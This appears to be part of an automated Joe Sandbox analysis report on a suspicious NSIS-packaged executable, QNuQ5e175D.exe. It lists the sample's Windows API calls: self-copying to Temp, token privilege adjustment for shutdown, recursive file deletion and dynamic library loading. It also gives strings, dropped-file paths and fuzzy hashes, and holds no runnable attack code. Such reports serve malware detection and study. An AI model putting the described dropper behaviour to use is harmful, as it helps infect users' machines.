                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A3E
                                                            • Part of subcall function 00406337: MoveFileExW.KERNEL32(?,?,00000005,00405E35,?,00000000,000000F1,?,?,?,?,?), ref: 00406341
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\QNuQ5e175D.exe,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A54
                                                            • Part of subcall function 00405B5A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B83
                                                            • Part of subcall function 00405B5A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B90
                                                            • Part of subcall function 004068D4: FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00405F97,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068DF
                                                            • Part of subcall function 004068D4: FindClose.KERNELBASE(00000000), ref: 004068EB
                                                          • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AA2
                                                          • ExitProcess.KERNEL32 ref: 00403ABF
                                                          • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AC6
                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AE2
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AE9
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AFE
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B21
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B46
                                                          • ExitProcess.KERNEL32 ref: 00403B69
                                                            • Part of subcall function 00405B25: CreateDirectoryW.KERNELBASE(?,00000000,00403545,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00405B2B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                          • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$C:\Users\user\Desktop$C:\Users\user\Desktop\QNuQ5e175D.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                          • API String ID: 1813718867-2653512062
                                                          • Opcode ID: 3bbf329214e6d57898fd1087eec31c3cd4d4deec240645a0aaa836412135d51f
                                                          • Instruction ID: 854c728f01c0035939758d15b123b9002cb8995d15bf2fdbd915a0a46deb4321
                                                          • Opcode Fuzzy Hash: 3bbf329214e6d57898fd1087eec31c3cd4d4deec240645a0aaa836412135d51f
                                                          • Instruction Fuzzy Hash: 6DF1F470604301ABD320AF659D05B6B7EE8EB8570AF10483FF581B22D1DB7DDA458B6E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 151 40573b-405756 152 4058e5-4058ec 151->152 153 40575c-405823 GetDlgItem * 3 call 40452b call 404e84 GetClientRect GetSystemMetrics SendMessageW * 2 151->153 155 405916-405923 152->155 156 4058ee-405910 GetDlgItem CreateThread CloseHandle 152->156 176 405841-405844 153->176 177 405825-40583f SendMessageW * 2 153->177 158 405941-40594b 155->158 159 405925-40592b 155->159 156->155 162 4059a1-4059a5 158->162 163 40594d-405953 158->163 160 405966-40596f call 40455d 159->160 161 40592d-40593c ShowWindow * 2 call 40452b 159->161 173 405974-405978 160->173 161->158 162->160 170 4059a7-4059ad 162->170 166 405955-405961 call 4044cf 163->166 167 40597b-40598b ShowWindow 163->167 166->160 174 40599b-40599c call 4044cf 167->174 175 40598d-405996 call 4055fc 167->175 170->160 171 4059af-4059c2 SendMessageW 170->171 178 405ac4-405ac6 171->178 179 4059c8-4059f3 CreatePopupMenu call 4065b4 AppendMenuW 171->179 174->162 175->174 180 405854-40586b call 4044f6 176->180 181 405846-405852 SendMessageW 176->181 177->176 178->173 188 4059f5-405a05 GetWindowRect 179->188 189 405a08-405a1d TrackPopupMenu 179->189 190 4058a1-4058c2 GetDlgItem SendMessageW 180->190 191 40586d-405881 ShowWindow 180->191 181->180 188->189 189->178 192 405a23-405a3a 189->192 190->178 195 4058c8-4058e0 SendMessageW * 2 190->195 193 405890 191->193 194 405883-40588e ShowWindow 191->194 196 405a3f-405a5a SendMessageW 192->196 197 405896-40589c call 40452b 193->197 194->197 195->178 196->196 198 405a5c-405a7f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->190 200 405a81-405aa8 SendMessageW 198->200 200->200 201 405aaa-405abe GlobalUnlock SetClipboardData CloseClipboard 200->201 201->178
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405799
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004057A8
                                                          • GetClientRect.USER32(?,?), ref: 004057E5
                                                          • GetSystemMetrics.USER32(00000002), ref: 004057EC
                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040580D
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040581E
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405831
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040583F
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405852
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405874
                                                          • ShowWindow.USER32(?,00000008), ref: 00405888
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004058A9
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004058B9
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058D2
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058DE
                                                          • GetDlgItem.USER32(?,000003F8), ref: 004057B7
                                                            • Part of subcall function 0040452B: SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004058FB
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_000056CF,00000000), ref: 00405909
                                                          • CloseHandle.KERNELBASE(00000000), ref: 00405910
                                                          • ShowWindow.USER32(00000000), ref: 00405934
                                                          • ShowWindow.USER32(?,00000008), ref: 00405939
                                                          • ShowWindow.USER32(00000008), ref: 00405983
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004059B7
                                                          • CreatePopupMenu.USER32 ref: 004059C8
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059DC
                                                          • GetWindowRect.USER32(?,?), ref: 004059FC
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405A15
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A4D
                                                          • OpenClipboard.USER32(00000000), ref: 00405A5D
                                                          • EmptyClipboard.USER32 ref: 00405A63
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A6F
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405A79
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A8D
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405AAD
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405AB8
                                                          • CloseClipboard.USER32 ref: 00405ABE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: <c${
                                                          • API String ID: 590372296-345804006
                                                          • Opcode ID: d983cdf5f34f6151cad2321293c356f45f3306b1bb5ea95040b854dda8cdae6d
                                                          • Instruction ID: d3b07f9c2581fb6b60ef1a2666babd9f8dcdaaa8066b0d43d813b8afd8e95190
                                                          • Opcode Fuzzy Hash: d983cdf5f34f6151cad2321293c356f45f3306b1bb5ea95040b854dda8cdae6d
                                                          • Instruction Fuzzy Hash: 03B159B0900608FFDF11AF60DD89AAE7B79FB48355F00813AFA45BA1A0C7785A51DF58
                                                          APIs
                                                            • Part of subcall function 6FC412BB: GlobalAlloc.KERNEL32(00000040,?,6FC412DB,?,6FC4137F,00000019,6FC411CA,-000000A0), ref: 6FC412C5
                                                          • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6FC41D2D
                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 6FC41D75
                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 6FC41D7F
                                                          • GlobalFree.KERNEL32(00000000), ref: 6FC41D92
                                                          • GlobalFree.KERNEL32(?), ref: 6FC41E74
                                                          • GlobalFree.KERNEL32(?), ref: 6FC41E79
                                                          • GlobalFree.KERNEL32(?), ref: 6FC41E7E
                                                          • GlobalFree.KERNEL32(00000000), ref: 6FC42068
                                                          • lstrcpyW.KERNEL32(?,?), ref: 6FC42222
                                                          • GetModuleHandleW.KERNEL32(00000008), ref: 6FC422A1
                                                          • LoadLibraryW.KERNEL32(00000008), ref: 6FC422B2
                                                          • GetProcAddress.KERNEL32(?,?), ref: 6FC4230C
                                                          • lstrlenW.KERNEL32(00000808), ref: 6FC42326
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1977389511.000000006FC41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FC40000, based on PE: true
• Associated: 00000000.00000002.1977358248.000000006FC40000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1977514250.000000006FC44000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1977627868.000000006FC46000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6fc40000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                          • String ID:
                                                          • API String ID: 245916457-0
                                                          • Opcode ID: b9e3c165712929bca43d486d815d07f7021f44d2931561c2772efefce4255d9f
                                                          • Instruction ID: a117f8081e58c7f092c16355d4379ebc74cead4ef916c4ad6260229a1c735063
                                                          • Opcode Fuzzy Hash: b9e3c165712929bca43d486d815d07f7021f44d2931561c2772efefce4255d9f
                                                          • Instruction Fuzzy Hash: 6C22BD71D0460ADADB12CFADC9952EEBBF0FF05319F10462AD1A5E6280F770AA95CB50

Control-flow Graph (rendered graph not recoverable from text; summary of the node list)
• Function 00405C83–00405E43
• Direct API calls at graph nodes: DeleteFileW (405cab), lstrcatW (405cee, 405d11), lstrlenW and FindFirstFileW (405d1c), FindNextFileW (405dc5), FindClose (405ddb)
• Internal subcalls: 405f4e, 406577, 405e92, 4068d4, 405e46, 405c3b, 4055fc, 406337; node 405d86 calls 405c83 again, i.e. the routine recurses into itself
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405CAC
                                                          • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405CF4
                                                          • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405D17
                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405D1D
                                                          • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405D2D
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DCD
                                                          • FindClose.KERNEL32(00000000), ref: 00405DDC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$pB
                                                          • API String ID: 2035342205-4063877507
                                                          • Opcode ID: 8ddda18a5e03c3094d99475b595a137c5d28125fbada97bd0876376ed00bff5b
                                                          • Instruction ID: 26a84cf893ecfac7fe2d2a8ab9ced37764d13583991ceadb599b2dfedf858990
                                                          • Opcode Fuzzy Hash: 8ddda18a5e03c3094d99475b595a137c5d28125fbada97bd0876376ed00bff5b
                                                          • Instruction Fuzzy Hash: 8E41B030800A18B6CB21AB65DC4DAAF7778EF42718F10813BF851711D1DB7C4A82DEAE
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00405F97,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068DF
                                                          • FindClose.KERNELBASE(00000000), ref: 004068EB
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp, xrefs: 004068D4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp
                                                          • API String ID: 2295610775-469814226
                                                          • Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                          • Instruction ID: 1cf04926a4a3889f6b92b588199f87985a57aa1d1812818edfb9113e4ef6e03f
                                                          • Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                          • Instruction Fuzzy Hash: 53D012725162209BC240673CBD0C84B7A58AF253317518A3AF46AF61E0DB348C639699

Control-flow Graph (rendered graph not recoverable from text; summary of the node list)
• Function 00403FF7–004044CC (dialog procedure passed to DialogBoxParamW at 00403ED2)
• Direct API calls at graph nodes: SetWindowPos, ShowWindow, GetWindowLongW, DestroyWindow, SetWindowLongW, GetDlgItem, SendMessageW, IsWindowEnabled, SetClassLongW, EndDialog, KiUserCallbackDispatcher, EnableWindow, GetSystemMenu, EnableMenuItem, lstrlenW, SetWindowTextW, CreateDialogParamW, GetWindowRect, ScreenToClient
• Internal subcalls: 4044f6, 40140b, 404542, 401389, 40455d, 4044cf, 4065b4, 404518, 40452b, 403fd8, 406577
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404033
                                                          • ShowWindow.USER32(?), ref: 00404053
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404065
                                                          • ShowWindow.USER32(?,00000004), ref: 0040407E
                                                          • DestroyWindow.USER32 ref: 00404092
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 004040AB
                                                          • GetDlgItem.USER32(?,?), ref: 004040CA
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040DE
                                                          • IsWindowEnabled.USER32(00000000), ref: 004040E5
                                                          • GetDlgItem.USER32(?,00000001), ref: 00404190
                                                          • GetDlgItem.USER32(?,00000002), ref: 0040419A
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 004041B4
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404205
                                                          • GetDlgItem.USER32(?,00000003), ref: 004042AB
                                                          • ShowWindow.USER32(00000000,?), ref: 004042CC
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042DE
                                                          • EnableWindow.USER32(?,?), ref: 004042F9
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040430F
                                                          • EnableMenuItem.USER32(00000000), ref: 00404316
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040432E
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404341
                                                          • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040436B
                                                          • SetWindowTextW.USER32(?,0042CA68), ref: 0040437F
                                                          • ShowWindow.USER32(?,0000000A), ref: 004044B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID: <c
                                                          • API String ID: 121052019-1732094670
                                                          • Opcode ID: 85e06a1bfb462d71b49bda8b571905cea54c43c8c85ee92c4a54339351a5f343
                                                          • Instruction ID: 8cad316efbf8f9c89f6feec2797fb874042f4abab253e3557332251604c97906
                                                          • Opcode Fuzzy Hash: 85e06a1bfb462d71b49bda8b571905cea54c43c8c85ee92c4a54339351a5f343
                                                          • Instruction Fuzzy Hash: C6C1A1B1500204BBDB206F61EE89E2B3AA8FB85755F01453EF751B51F0CB39A8529B2D

Control-flow Graph (rendered graph not recoverable from text; summary of the node list)
• Function 00403C49–00403F1E
• Direct API calls at graph nodes: lstrcatW (403cc4), lstrlenW (403d49), lstrcmpiW (403d57), GetFileAttributesW (403d67), LoadImageW (403da0), RegisterClassW (403dc7, 403ea3), SystemParametersInfoW and CreateWindowExW (403dfd), ShowWindow (403e69), GetClassInfoW (403e8f, 403ea3), DialogBoxParamW (403eb9)
• Internal subcalls: 40696b, 4064be, 406445, 403f1f, 405f4e, 4065b4, 405e73, 405e46, 406577, 40140b, 4068fb, 4056cf, 403b99
                                                          APIs
                                                            • Part of subcall function 0040696B: GetModuleHandleA.KERNEL32(?,00000020,?,00403662,0000000C,?,?,?,?,?,?,?,?), ref: 0040697D
                                                            • Part of subcall function 0040696B: GetProcAddress.KERNEL32(00000000,?), ref: 00406998
                                                          • lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\QNuQ5e175D.exe",00008001), ref: 00403CCA
                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420), ref: 00403D4A
                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D5D
                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403D68
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres), ref: 00403DB1
                                                            • Part of subcall function 004064BE: wsprintfW.USER32 ref: 004064CB
                                                          • RegisterClassW.USER32(004336A0), ref: 00403DEE
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403E06
                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E3B
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403E71
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E9D
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403EAA
                                                          • RegisterClassW.USER32(004336A0), ref: 00403EB3
                                                          • DialogBoxParamW.USER32(?,00000000,00403FF7,00000000), ref: 00403ED2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                          • API String ID: 1975747703-509749328
                                                          • Opcode ID: a4b6b062c3cda51b96eb3e1e848ea22fea792b1bb39582dd55e536ebb93ad2e9
                                                          • Instruction ID: c722afd28cb3ad108a11d8546cd61d6ece1c23d3a169ae69e987cf65e7f86a01
                                                          • Opcode Fuzzy Hash: a4b6b062c3cda51b96eb3e1e848ea22fea792b1bb39582dd55e536ebb93ad2e9
                                                          • Instruction Fuzzy Hash: 7961C370500700BED620AF66AD46F2B3A6CEB85B5AF40053FF945B22E2DB7C5941CA6D

Control-flow Graph (legend: Executed / Not Executed)
